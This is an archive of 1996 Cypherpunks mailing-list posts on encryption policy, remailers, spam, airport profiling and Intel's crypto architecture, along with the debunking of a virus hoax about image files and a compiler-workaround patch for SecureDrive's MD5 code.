* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 11:38:22 +0800
To: cypherpunks@toad.com
Subject: mailing lists
Message-ID: <19960830.205359.4758.1.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


If any body knows any good mailings lists please tell me.


                                                                         
      -P. Cummings-
                                                   		     
Patrickbc@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 1 Sep 1996 07:52:31 +0800
To: cypherpunks@toad.com
Subject: BOM_ban
Message-ID: <199608312202.WAA19609@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to DL for noting this report. 
 
 
   8-31-96. WaPo: 
 
   "New Airport Bomb Plan Considered. Computer Profiles, 
   High-Tech Detectors Central to System" 
 
      A presidential commission on aviation security is 
      considering a bomb detection plan that would require 
      U.S. airlines to scrutinize all passengers at U.S. 
      airports using massive computer files to identify 
      potential terrorists or other suspicious individuals. 
 
      The plan would require creation of a computer profiling 
      system that would examine passengers' bill-paying 
      records, flying habits and much other data to determine 
      which checked baggage should undergo examination by 
      sophisticated explosives detection equipment. 
 
      Numerous legal issues still need to be resolved, 
      including thorny civil liberties questions such as 
      whether the airlines would be given access to 
      information from government computer systems like those 
      containing criminal records. 
 
      Would the airlines store information on individuals? 
      Would they go out and seek information from credit 
      bureaus and other private sources? 
 
   ----- 
 
   http://jya.com/bomban.txt  (10 kb) via anonymizer 
 
   BOM_ban 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 1 Sep 1996 12:08:05 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: Mail OnNet
In-Reply-To: <199609010014.RAA03254@mail.eskimo.com>
Message-ID: <199609010219.WAA17853@nrk.com>
MIME-Version: 1.0
Content-Type: text


Joel McNamara sez:
> 
> http://www.ftp.com/mkt_info/onnet32/try.htm
> 
> IMHO, this is getting very close to transparent secure e-mail for the mas=
> ses.
 
> Two notes.  (1) It only runs under Win95 and NT.  (2) It's ITAR restricte=

Three. It's stuck in MIME mode.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 1 Sep 1996 12:47:42 +0800
To: cypherpunks@toad.com
Subject: Re: WARNING vIRuS!
In-Reply-To: <Pine.3.89.9608311205.A15184-0100000@netcom>
Message-ID: <Pine.LNX.3.95.960831225055.1669B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Paul S. Penrod wrote:

> Binary launches are the way they do it, and the way a virus spreads, 
> unless you get caught up with autoexecuting Word and Excel macros.
> 
> I have yet to see *any* truly data propogating viruses.

Would you count the fingerd exploit used in the Internet Worm as a data
propogating virus?  If a poorly written mail program doesn't do bounds
checking, it could conceivably allow for a Good Times-like virus.  However,
highly unlikely, since mail programs are too diverse and it would be very
doubtful that a brain-dead mail program would become very widespread.  I would
be much more worried about other non-email programs that fail to do bounds
checking (like Netscape v1.1).

-- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@widomaker.com>
Date: Sun, 1 Sep 1996 13:10:59 +0800
To: cypherpunks@toad.com
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
Message-ID: <Pine.UW2.3.93.960831232038.22836C-100000@wilma>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sat, 31 Aug 1996 21:29:56 -0400
From: Ralph Jennett <jennett@citicom.com>
To: Alan Horowitz <alanh@widomaker.com>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense..

The problem is, from my experience at Roosevelt Roads, the Navy never
conducts live fire exercises without declaring the area of operation
strictly off limits to non-military aircraft.  Also, the 747 would have
shown up WITH ITS TRANSPONDER DATA on the screens on an Aegis ship, so why
would they fire?  And, I didn't think that a P3 pilot would fly around in
controlled air space with his transponder shut off, especially when he might
become a target himself (or just a victum of a mid air collision) if he
isn't squawking.  I suppose the story that you sent could be true, but if it
is, I'm surprised that nothing like that ever happened before, given the
sloppy procedures being followed.  The latest RELEASED data makes it sound
like a bomb in the cabin (row 24, right side) is responsible.  I'm not sure
that I don't believe that, although I am quite suspicious of anything coming
out of the justice department under the current President and Attorney General.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 1 Sep 1996 16:35:20 +0800
To: kickboxer <charlee@netnet.net>
Subject: Re: WARNING vIRuS!
Message-ID: <3.0b11.32.19960831234035.00b1f6cc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 AM 8/31/96 -0500, kickboxer  ingnoring the "clueserver refused by
host" messages wrote:
>        There is a new and VERY dangerous virus called the HAZ-MAT virus!
>it fucks up the sectors on your hd, and really messes up the partition
>tables.  It does this once a week, picking a random time to do it.  99.9% of
>virus scanners and other antivirus programs will not recognize it, for it is
>a totally new strain, using a never before seen code.... Be warned!  The
>HAZ-MAT virus usually resides in JPG, and GIF files... once the files are
>viewed, the virus takes effect.
>scan all images upon download!

This is the clueless kind of crap I expect pitched to AOL users and upper
level management.

GIF and JPEGs contain *NO* executable code.  You cannot get viruses from
them.  You obviously have no clue as to what the hell you are talking about.

The only way that you could obtain the effects described above is with Black
Magic and/or Voodoo.  (And not even then.)

I remember a similar hoax going around about 3-4 years ago about viruses in
image files.  I guess nothing on the net is ever forgotten entirely.
Especially the urban legends and bullshit.
---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Sun, 1 Sep 1996 13:40:14 +0800
To: cypherpunks@toad.com
Subject: Esther Dyson on Remailers
Message-ID: <Pine.OSF.3.91.960831233808.23669B-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


pretty grim reading in the LA Times article if that is really the EFF 
position on remailers.

could someone straighten this out, or at least give us the EFF's view of 
why remailers are a bad thing? 

with friends like that, who needs enemies?

---------------

So long, Julf - Thank you for a valuable public service!
Best of luck to you!
--
to unsubscribe, mail to majordomo@toad.com a message that reads:
unsubscribe cypherpunks (in the message body, not subject line).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 1 Sep 1996 16:37:50 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: WARNING vIRuS!
In-Reply-To: <Pine.LNX.3.95.960831225055.1669B-100000@gak>
Message-ID: <Pine.3.89.9608312317.A20150-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 31 Aug 1996, Mark M. wrote:

> On Sat, 31 Aug 1996, Paul S. Penrod wrote:
> 
> > Binary launches are the way they do it, and the way a virus spreads, 
> > unless you get caught up with autoexecuting Word and Excel macros.
> > 
> > I have yet to see *any* truly data propogating viruses.
> 
> Would you count the fingerd exploit used in the Internet Worm as a data
> propogating virus?  If a poorly written mail program doesn't do bounds
> checking, it could conceivably allow for a Good Times-like virus.  However,
> highly unlikely, since mail programs are too diverse and it would be very
> doubtful that a brain-dead mail program would become very widespread.  I would
> be much more worried about other non-email programs that fail to do bounds
> checking (like Netscape v1.1).
> 
> -- Mark
> 

No, I wouldn't consider the fingerd exploit a data propogated virus in 
the same sense as data embedded in a purely passive activity (viewing an 
image file) which somehow launches a vicious nasty on your disk. However, 
you do bring up an interesting point in that example.

Netscape and programs of that ilk, IMO, yield antoher exploitable pathway 
into a system, should someone figure a method to shove a jam into the 
doorway to keep the door open long enough to allow a renegade proc to be 
started and executed outside the control of the local operator.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skipp OBC)
Date: Fri, 23 Aug 1996 19:25:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "----- Message body suppressed -----"
In-Reply-To: <ae43a99302021004167e@[205.199.118.202]>
Message-ID: <199608240225.TAA11856@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 1:10 AM 8/21/96, llurch@stanford.edu (Rich Graves) wrote:
! >   ----- Message body suppressed -----
! >
! 
! 
! Sounds good to me. Keep it up.
! 
! 
! --Tim May
! 
! 
! --
! [This Bible excerpt awaiting review under the U.S. Communications Decency
! Act of 1996]
! And then Lot said, "I have some mighty fine young virgin daughters. Why
! don't you boys just come on in and fuck them right here in my house - I'll
! just watch!"....Later, up in the mountains, the younger daughter said:
! "Dad's getting old. I say we should fuck him before he's too old to fuck."
! So the two daughters got him drunk and screwed him all that night. Sure
! enough, Dad got them pregnant, and had an incestuous bastard son....Onan
! really hated the idea of doing his brother's wife and getting her pregnant
! while his brother got all the credit, so he pulled out before he
! came....Remember, it's not a good idea to have sex with your sister, your
! brother, your parents, your pet dog, or the farm animals, unless of course
! God tells you to. [excerpts from the Old Testament, Modern Vernacular
! Translation, TCM, 1996]

Your sigs are better looking than his body.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Sat, 24 Aug 1996 11:30:11 -0700 (PDT)
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive News 8/24/96
Message-ID: <VqV6sD17w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

SecureDrive Users:

It's been brought to my attention that users who attempt to compile
SecureDrive 1.4b using Turbo C++ 3.00 are haveing a problem in that
the MD5 routine does not produce a correct result, so that the key
generated from a given passphrase will not be the same as the
pre-compiled version.  This is a bug in Turbo C++, not SecureDrive!

However, a bypass for the problem is possible by modifying SD source
as follows

- ------------------------------cut here-----------------------
*** C:\SECDR14B\UNC\MD5.C       Sun May 09 19:38:36 1993
- --- MD5.C       Wed Aug 14 00:58:46 1996
***************
*** 12,17 ****
- --- 12,20 ----
   * of the MD5 routines in RSAREF.  Due to this alteration, this
   * code is "derived from the RSA Data Security, Inc. MD5 Message-
   * Digest Algorithm".  (See below.)
+  *
+  * Simplified some expressions to avoid incorrect compiles with
+  * some compilers, e.g. Turbo C 3.0  EWS  8/96
   */

  /*
***************
*** 135,145 ****
- --- 138,158 ----

      /* transform if necessary */
      if (mdi == 0x40) {
+ #if defined (__TURBOC__)
        for (i = 0, ii = 0; i < 16; i++, ii += 4)
+        {
+         in[i] =   (((UINT4)mdContext->in[ii+3]) << 24);
+         in[i] |=  (((UINT4)mdContext->in[ii+2]) << 16);
+         in[i] |=  (((UINT4)mdContext->in[ii+1]) << 8);
+         in[i] |=   ((UINT4)mdContext->in[ii]);
+        }
+ #else
+       for (i = 0, ii = 0; i < 16; i++, ii += 4)
          in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
                  (((UINT4)mdContext->in[ii+2]) << 16) |
                  (((UINT4)mdContext->in[ii+1]) << 8) |
                  ((UINT4)mdContext->in[ii]);
+ #endif
        Transform (mdContext->buf, in);
        mdi = 0;
      }
***************
*** 167,178 ****
    padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi);
    MD5Update (mdContext, PADDING, padLen);

!   /* append length in bits and transform */
    for (i = 0, ii = 0; i < 14; i++, ii += 4)
      in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
              (((UINT4)mdContext->in[ii+2]) << 16) |
              (((UINT4)mdContext->in[ii+1]) << 8) |
              ((UINT4)mdContext->in[ii]);
    Transform (mdContext->buf, in);

    /* store buffer in digest */
- --- 180,201 ----
    padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi);
    MD5Update (mdContext, PADDING, padLen);

!   /* append length in bits and transform 1.4c*/
! #if defined (__TURBOC__)
!   for (i = 0, ii = 0; i < 14; i++, ii += 4)
!    {
!     in[i] =   (((UINT4)mdContext->in[ii+3]) << 24);
!     in[i] |=  (((UINT4)mdContext->in[ii+2]) << 16);
!     in[i] |=  (((UINT4)mdContext->in[ii+1]) << 8);
!     in[i] |=   ((UINT4)mdContext->in[ii]);
!    }
! #else
    for (i = 0, ii = 0; i < 14; i++, ii += 4)
      in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
              (((UINT4)mdContext->in[ii+2]) << 16) |
              (((UINT4)mdContext->in[ii+1]) << 8) |
              ((UINT4)mdContext->in[ii]);
+ #endif
    Transform (mdContext->buf, in);

    /* store buffer in digest */
- ------------------------------cut here-----------------------

This code will be inserted into any future version of SecureDrive,
but no new release is planned at this time.

For those users of Win95 and SecureDrive who are concerned about loss
of 32-bit disk access, I've recently learned that use of Secure Device

  ftp.demon.co.uk:/pub/ibmpc/secdev/secdev14.arj

instead avoids this requirement. Although the Secure Device virtual
drive is listed as in compatibility mode, the real drives are not so
affected.  And since the virtual drive is mapped to a dos file on one
of the real drives, I believe you get 32-bit phyical drive access
there as well, although access is still slowed by CPU time necessary
to encrypt and decrypt.

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>
Edgar W. Swank   <EdgarSwank@Juno.com>
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Home Page: http://members.tripod.com/~EdgarS/index.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMh7d4t4nNf3ah8DHAQHNdAP3RKd07B55fkW5CazT8mMaGUoTtjxSvUBv
3ykPvBhHvu7egb4EB1/XcBTM3K/6QeE8Dt10XJVX15Fd9nHY+XI0c0VB8Trlb/NB
0ymq+/SchedtUNmCgDeycbF104bfirpuXKy0OChDfpgMe0d/ifCXny6Co0BqIbRi
fQyKtXzOxQ==
=h1RT
-----END PGP SIGNATURE-----

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 24 Aug 1996 11:31:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <3.0b11.32.19960823114947.006d7d7c@central.tansoft.com>
Message-ID: <199608240907.EAA13180@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0b11.32.19960823114947.006d7d7c@central.tansoft.com>, on 08/23/96 at 11:49 AM,
   "James C. Sewell" <jims@MPGN.COM> said:

>At 03:35 AM 8/23/96 +0000, Vipul Ved Prakash wrote:
>>
>>This is peculiar. Nobody seems to mind ads in Newspapers, printed 
>>magazines, TV, and for that matter web sites. That is unwanted stuff

>I'd suggest that most/all of us 'mind' ads in papers, tv, etc.  The 
>difference is that while we can do nothing about commercials on
>TV (short of breaking federal law and jamming the signal) we can
>do something about spam.  If there is enough concensus we can
>develop/distribute/encourage the use of  new mailers that will help
>defeat spam.  

> For example:  If mail comes into a server that has more than 25
>recipients then it is only forwarded to those who have "signed up"
>for that sender.  When we subscribe to Cypherpunks we also have
>to register that with our network of mail servers.  Then if Mr. Spam
>sends stuff out it's not been "signed up" for so it gets trashed.

>I don't really like mail servers redirecting my mail, but perhaps we
>could arrive at a reasonable criteria for filtering if we tried real hard.


No I have to dissagree. Who I send mail to or whom I receive mail from is no-ones business. I for one have no intention of "signing up" or "regestering" with any mail server. I most certainally want to be the one to decide what mail I receive or do not receive, not someone elses idea of what I should receive.

Sorry but I will not be made a sheep for the "protection" from spam. baah baah


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->Program call to load Windows- "Here_piggy_piggy_piggy"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh7PDY9Co1n+aLhhAQGmnwP/fb6JTcVj3sP4WiqwDYgW5lzHEjNulgaZ
kvLbSlWde598YnEiDVXKSWZ6kYe4C0MEaFmdVpDq6i/Kg97YOYkmvnblYlEF9J7o
BZf7SEL9paNd2UE/DO2jO4VS2VMTfvYIeEM1TOjN2nWLhjC/zvY/WdoO+rBRQ/vk
RIx1FwKPu64=
=Gt8i
-----END PGP SIGNATURE-----
 
MR/2 Tag->My best view from a Window was through OS/2.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 24 Aug 1996 11:31:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Regulation of Commerce" and the Crypto Issue
In-Reply-To: <ae432be9000210041c17@[205.199.118.202]>
Message-ID: <199608240915.EAA13219@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <ae432be9000210041c17@[205.199.118.202]>, on 08/23/96 at 02:51 AM,
   tcmay@got.net (Timothy C. May) said:

>In fact, since nearly everything involves "commerce" in some way, whether
>interstate or not, the "regulate commerce" clause can presumably be used as
>a jusitification for interfering in all sorts of areas.

>The several legal experts out there on this list can clarify any errors of
>interpretation I have made. I certainly know that the commerce clause
>cannot be used to suppress certain kinds of speech, though the boundaries
>of where it may be applied seem unclear.

>I do expect it to be used for crypto, though, and this might even be upheld
>by the Supremes, especially in any areas directly involving "digital
>commerce."

>We should watch for this, and think about ways to deflect or derail such
>interpretations.

This clause has been one of the "weak links" of the Constitution used by our government to regulate business in the 20th century. Rosevelt used it as justification for many of his unconstitutional projects in the 30's. Nixion used it for his "price freezes" in the 70's.

This clause had good purposes when it was put into the Constitution. What it was for was the following:

    -Give the government the power to establish tariffs & regulate trade with foriegn governmnets.(this had previously been handled by the individual states)

    -Prevent the states from imposing tariffs on products coming into or leaving their state or otherwise hamper commerice between the states.

This clause was never intended to give the federal government unlimited power to "regulate commerce" inside of the country.

Remember that our founding fathers were fearfull of a powerfull centralized govewrnment. They established checks and balances, and only gave the federal goverment the minimum amount of power needed to keep the country together. All other powers were to be regulated to the states and the people.

We have no-one to blame but ourselfs. Our founding fathers new that we needed an inteligent, well informed, population for a democracy to survive. Unfortunatly we have truned into a country of sheep who beleive everything the "boob tube" tells them. At the drop of a hat they are willing to give up hard earned fredoms paid for with the blood of our ancestors for small promises of security.

I remember the oath I took years ago when I joined the Marine Corps:

"To Defend the Constitution from ALL threats foreign AND DOMESTIC"


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->It's OS/2, Jim, but not OS/2 as we know it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh6KsI9Co1n+aLhhAQEO4QP8CQA84feezlGHB6XMui6Pj8fVzkmnYat/
jnYHGT7nEpCpTZRXE40NMbMyv7rDTeQtolvxc9pdKf1bT+Vew5ulRhqyoQNiLnSW
P2MQJOFm2HNstGwNFg3+lZ5oTUwGjDJhiloL/PP69bRCKVTtWCb9FX1PPyZKMwAN
vI+GiF7YLI8=
=pUAI
-----END PGP SIGNATURE-----
 
MR/2 Tag->If at first you don't succeed, work for Microsoft.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 24 Aug 1996 11:31:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: USPS
In-Reply-To: <199608231401.HAA10139@toad.com>
Message-ID: <199608240915.EAA13224@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199608231401.HAA10139@toad.com>, on 08/23/96 at 10:01 AM,
   "Peter Trei" <ptrei@ACM.ORG> said:

>Closing deals: Ever hear of faxes or FedEx?

>My personal impression was that Raines had been listening to his 
>own propaganda for too long, and was rather out of touch with the 
>way things are done outside of the Beltway. I got the feeling that 
>the USPS was desperately trying to find a role in a time where it
>was becoming merely the cheapest and slowest player in the 
>package delivery business. 

Ahhh... But you truly miss the buety of this system.

Once in place all the goverment needs to do is ban all e-mail not sent through their system. Add this to the outlawing of all non-keyescrowed encryption, and the ability to archive all messages sent through their system. Now the goverment would have total access to everything you wright.

Eventually they could get rid of all snail-mail. Put in place scaners with OCR, handwrighting reconition & voice dictation in local post offices for those without Inet access.

The even BIGGER PICTURE:

Eventually we will not have dial-up internet access the way it is today. Mater of fact we will not have phone systems the way we have today. Instead we will have 1 huge network, a SuperIneternet, inwhich all homes & business are connected. For those without computers in their homes will be small dumb terminals that will let them connect & provide basic services (such devices are being developed right now).

In such a system anyone could be monitored, at any time.

Sound far fetched? The technology is here now to do this. Just remember that the "powers to be" don't think in terms of months or years but decades. It may take 20-30yrs for such a system to be fully implimented. "They" are very patient.

1984? no, 2084 without a doubt!


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->Windows: Just another pane in the glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh6EZI9Co1n+aLhhAQGh9QQAht8JS5rNOLyk3m8XlcXyjEFr5meerldB
9wDqhnaHJbgLmgC2NNcvAcYgGpAQfMRDHwzBXPX0PBCndXk87BfppFtnvexGOhgh
gD/170jrgbGbH1CDAvOCxtv4Hp0kM6qk1yO2IJcfPjhPZqD/mPyeUwV/MEpw4blE
iFUfY4Uvvsg=
=pho2
-----END PGP SIGNATURE-----
 
MR/2 Tag->Windows NT?  New Technology?  I don't think so...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 24 Aug 1996 11:31:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Intel to rule the basic crypto engine market?
In-Reply-To: <Pine.BSI.3.91.960823160256.19295A-100000@wichita.fn.net>
Message-ID: <199608240916.EAA13229@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.BSI.3.91.960823160256.19295A-100000@wichita.fn.net>, on 08/23/96 at 04:12 PM,
   "Bruce M." <bkmarsh@feist.com> said:


>InfoWorld, August 19, 1996, p1
>By Luc Hatlestad & Tom Quinlan

>------------------------------

>    Looking to bring a standard infrastructure to hardware- and 
>software-based encryption offerings, Intel Corp. has started developing a 
>Common Data Security Architecture (CDSA) designed to integrate security 
>software, operating systems, and third party applications.

Hmmmm.....

Intresting but..., In the era of ITAR, GAK, Key Escrows,Clipper,& FileGate do we really want to put all our eggs in one basket? And that basket being based on hardware? IMHO I don't see Intell standing up to the government any more than Netscape, Mircosoft, IBM, or Lotus has. I have serious doubts that our "beloved" goverment will alow any standard to be adopted that does not allow them access whenever they please. I personally do not run any security code on my machines that I do not have the
source for & have instpected.


No source=No trust.


>[...]
>------------------------------

>http://www.infoworld.com/cgi-bin/displayArchives.pl?960816.encryption.htm
>   

>                       ________________________________
>                      [ Bruce M. - Feist Systems, Inc. ]
>                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>     "Official estimates show that more than 120 countries have or are 
>      developing [information warfare] capabilities." -GAO/AIMD-96-84
>                         So, what is your excuse now?


Including NSA, CIA, SS, FBI, Justice Department, .... I am more concern of the activities of our own government against its own citicens than any foreign government. Who is watching the watchers and what is YOUR execuse?


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->Have you crashed your Windows today?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh5+d49Co1n+aLhhAQFP+QP/au8Ov58AFTNRzLI+Sxz8Mjf9G1ZKCVvV
EeoxWqKTdl0Sum5ygHEEc9oibK8vBllEP5pONyhhi/8hQGd5T82AQQAzbxZLcLK+
If8Em2wjnZz1aRiC8La2myXXvpdzzzDIE7UQ5WcjZ8BB06h3qhVSA8hveNsFhaAC
jW9OMDN2ky8=
=boLv
-----END PGP SIGNATURE-----
 
MR/2 Tag->The sad thing about Windows bashing is it's all true.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 81764205@cshore.com
Date: Sat, 24 Aug 1996 16:17:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Remailer
Message-ID: <321F0ED6.F8C@cshore.com>
MIME-Version: 1.0
Content-Type: text/plain


Help!!!! I need a good Anonymous remailer, can somebody send me a program 
that does just that. Thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 24 Aug 1996 11:29:49 -0700 (PDT)
To: isi@hooked.net
Subject: Re: CyberTerrorism
Message-ID: <199608241141.LAA08906@pipe4.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 23, 1996 18:34:42, '"Institute for Security and Intelligence"
<isi@hooked.net>' wrote: 
 
 
>John: 
> 
>Your message regarding my comments on CyberTerrorism was forwarded to me. 
 
>Rather than waxing poetic beration, how about some actually useful  
>perspective? 
> 
>If you have experience in this area, let's talk.  If you have something to
 
>contribute, let's get it out where it can be useful.   
> 
>It's time to put up, or shut up John. 
> 
>Regards, 
>Barry C. Collin 
 
--------- 
 
   Dear Mr. Collin, 
 
   Thank you for writing. And for the cyber-terrorism hoot, 
   which helps purge ignorant fears with insightful 
   laughter. 
 
   The best way I know for citizens to ease their induced- 
   panic of terrorism in all forms -- gov, com, edu, org -- 
   is to become more informed. And to be wary of "terrorist 
   threats" in all their burgeoning guises -- "national 
   security" being one of the most deceitful. 
 
   To counter Nat Sec snake oil in the rising commerce in 
   "cyber-terrorism" (a residue of the natsec oil tank) 
   citizens should participate in the wit and wisdom of 
   wide-open Internet mail-lists dealing with computer 
   privacy and security. 
 
   The best of these is the list Cypherpunks. (E-mail "info" 
   to majordomo@toad.com.) 
 
   Cypherpunks, far more tolerant and less treacherously 
   commercially self-serving than all others, explores an 
   amazing range of CompSec issues, technologies, policies, 
   strategies and fantasies. Its archive of several years 
   offers a historical treasure on the transformation of 
   state control of comp tech to its service of the 
   citizenry. 
 
   This is exemplified by Cypherpunks primary focus, 
   cryptography, and the diverse ways it has moved from 
   narrow use to conceal privileged power to widespread 
   application to protect individual privacy (especially 
   those dissenting to heirarchical authority -- gov, com, 
   edu, org). 
 
   Your agent provocateurist comedy on cyber-terrorist 
   inebriation could be enriched by hanging on Cypherpunks, 
   say, your buffoonery for secret briefing. "If you knew 
   what I knew" is a natsec-butt joke there, as it is 
   becoming globally to liberated citizen-units bellowing 
   "FA." 
 
   Congrats on exposing TLA-dementia of cyber-terrorism and 
   defanging its counter-agents by encouraging belly- 
   laughing at the all-too-blatant hype-artistry. Only Jim 
   Kallstrom does it better. 
 
   Best regards, 
 
   jya 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.net>
Date: Sat, 24 Aug 1996 17:06:36 -0700 (PDT)
To: zachb@netcom.com
Subject: Re: Weird "Suppression" messages
Message-ID: <199608250005.RAA10538@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: alano@teleport.com, zachb@netcom.com, rich@c2.org,
 cypherpunks@toad.com
Date: Sat Aug 24 20:05:46 1996
I have seen delivery receipts for messages use a similar format and since 
these are duplicates of full messages received earlier there is a 
probability that sendmail is misconfigured on littlefoot ( or whatever the 
box at mcom is ).

Lou Zirko

> At 10:36 PM 8/23/96 -0700, Z.B. wrote:
> >On Fri, 23 Aug 1996, Alan Olsen wrote:
> >
> >> At 10:54 PM 8/20/96 -0700, Rich Graves wrote:
> >> >   ----- Message body suppressed -----
> >> >
> >> >--SAA08114.840765294/tera.mcom.com--
> >> 
